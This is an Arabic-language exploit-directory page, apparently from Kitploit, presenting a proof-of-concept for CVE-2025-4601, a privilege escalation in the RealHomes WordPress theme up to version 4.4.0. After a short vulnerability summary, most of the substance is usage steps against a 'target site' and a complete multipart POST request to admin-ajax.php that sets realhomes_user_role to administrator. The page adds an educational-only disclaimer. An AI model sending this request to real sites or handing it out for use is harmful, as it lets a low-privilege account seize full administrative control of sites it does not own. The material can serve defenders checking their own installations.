Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4601 — RH - قالب ووردبريس العقارات <= 4.4.0 - مصادق عليه (مشترك+) رفع الامتيازات | Kitploit
أدوات/GitHubGitHub/yucaerin/cve-2025-4601
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubyucaerin/cve-2025-4601

CVE-2025-4601

RH - قالب ووردبريس العقارات <= 4.4.0 - مصادق عليه (مشترك+) رفع الامتيازات

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-4601 - WordPress RealHomes Theme <= 4.4.0 - تصعيد الصلاحيات

🔥 ملخص الثغرة القالب WordPress RealHomes الإصدارات <= 4.4.0 معرض لثغرة تصعيد الصلاحيات. تسمح هذه الثغرة للمستخدمين المُوثَّقين ذوي الصلاحيات المنخفضة (مثل المشتركين) بترقية أدوارهم إلى مسؤولين. تحدث هذه الثغرة من خلال الدالة inspiry_update_profile، التي تسمح بشكل غير صحيح للمستخدمين بتغيير دورهم إذا كان الخيار ere_allow_users_change_role مفعَّلاً.

يمكن استغلال هذه المشكلة بإرسال طلب POST مُصمَّم خصيصًا إلى نقطة النهاية admin-ajax.php، مع توفير المعامل realhomes_user_role المُعيَّن إلى administrator.

🔍 القالب المتأثر

  • اسم القالب: RealHomes
  • الإصدار المتأثر: <= 4.4.0
  • نوع الثغرة: تصعيد الصلاحيات
  • معرف CVE: CVE-2025-4601
  • درجة CVSS: 8.8 (حرجة)
  • التأثير: وصول إداري كامل → احتمالية اختراق الموقع

🧪 ميزات الاستغلال

  • 📥 يجلب nonce تلقائيًا من الصفحة المستهدفة.
  • 🔐 يرفع دور المستخدم إلى administrator عبر المعامل realhomes_user_role.
  • 🌐 لا يتطلب مصادقة إضافية غير تسجيل الدخول كمستخدم منخفض الصلاحية (مثل مشترك).
  • 💾 يُحدّث ملف المستخدم، مما يمنح المهاجم وصولاً إداريًا.

🧠 الباحث

  • الإسناد: Thai An

🚀 الاستخدام

  1. سجِّل الدخول إلى الموقع المستهدف كمستخدم منخفض الصلاحية (مثل مشترك).

  2. الوصول إلى نقطة النهاية /wp-admin/admin-ajax.php مع بيانات POST التالية، والتي تتضمن realhomes_user_role المُعيَّن إلى administrator:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/2
    Host: targetsite.com
    Cookie: wordpress_logged_in_xxx=...
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNGw1yuikHiYVYYsr
    
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="first-name"
    test
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="last-name"
    user
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="realhomes_user_role"
    administrator
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="action"
    inspiry_update_profile
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr--
    
  3. تحقق من الرد: إذا كان الطلب ناجحًا، فسيحصل المهاجم على صلاحيات إدارية.

  4. تأكيد بالوصول إلى صفحة /wp-admin/ للتحقق مما إذا كان المهاجم قد حصل على صلاحيات إدارية.

🔒 إخلاء مسؤولية: هذا المحتوى مُعد للأغراض التعليمية فقط ويجب استخدامه فقط على الأنظمة التي تمتلكها أو مُصرَّح لك صراحةً باختبارها. قد يؤدي سوء استخدام هذا الكود إلى عواقب قانونية.

تنزيل الأداة